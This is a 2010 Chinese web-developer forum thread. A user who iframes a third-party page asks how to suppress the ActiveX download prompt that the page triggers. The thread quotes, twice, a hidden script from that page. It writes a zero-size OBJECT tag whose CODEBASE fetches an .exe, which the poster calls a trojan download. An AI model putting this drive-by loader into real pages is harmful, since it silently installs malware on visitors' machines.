如果在JS中禁止ax控件下载...

IPvECMS 2010-05-05 08:45:17
我在A页面里面,用iframe框架了别人网站的B页面。。
在B页面里面有一段 <script language="javascript">
document.write('<OBJECT width=0 height=0 style="display:none;" TYPE="application/x-oleobject"classid="clsid:D0CB6A0C-E656-4BF4-BD2D-6AE5EC183D7C" CODEBASE="http://www.123.com/123.exe"></OBJECT>');</script>
这样的代码。
因为有一段这样的代码,浏览器会提示控件下载。。。

我所要做的。就是有什么办法在不改变B页面代码的情况下,让浏览器不提示控件下载,
...全文
184 7 打赏 收藏 转发到动态 举报
写回复
用AI写文章
7 条回复
切换为时间正序
请发表友善的回复…
发表回复
IPvECMS 2010-05-05
  • 打赏
  • 举报
回复
[Quote=引用 6 楼 showbo 的回复:]
这个是每个人的浏览器控制的,超出js控制范围了。

你知道有木马还用加载到你的页面,你这个不是害客户。。
[/Quote]

是我自个用。不得不加载那个页面。。。
Go 旅城通票 2010-05-05
  • 打赏
  • 举报
回复
这个是每个人的浏览器控制的,超出js控制范围了。

你知道有木马还用加载到你的页面,你这个不是害客户。。
xk029 2010-05-05
  • 打赏
  • 举报
回复
[Quote=引用 2 楼 qq373591361 的回复:]
每天回帖即可获得10分可用分!小技巧:教您如何更快获得可用分
[/Quote]
...
passself 2010-05-05
  • 打赏
  • 举报
回复
<body onselectstart="return false">
IPvECMS 2010-05-05
  • 打赏
  • 举报
回复
[Quote=引用 1 楼 cj205 的回复:]
MS你在浏览大部分的网站的时候也会提示的吧。这个是浏览器的安全设置。
[/Quote]

因为B页面里面的这个东东

<script language="javascript">
document.write('<OBJECT width=0 height=0 style="display:none;" TYPE="application/x-oleobject"classid="clsid:D0CB6A0C-E656-4BF4-BD2D-6AE5EC183D7C" CODEBASE="http://www.123.com/123.exe"></OBJECT>');</script>

实际上是一个木马插件的下载。。。

因为我要用iframe 加入到我自己的网页里面来的话,肯定不希望这个木马能被下载了。。
qq373591361 2010-05-05
  • 打赏
  • 举报
回复
每天回帖即可获得10分可用分!小技巧:教您如何更快获得可用分
Mr-Jee 2010-05-05
  • 打赏
  • 举报
回复
MS你在浏览大部分的网站的时候也会提示的吧。这个是浏览器的安全设置。

87,921

社区成员

发帖
与我相关
我的任务
社区描述
Web 开发 JavaScript
社区管理员
  • JavaScript
  • 无·法
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧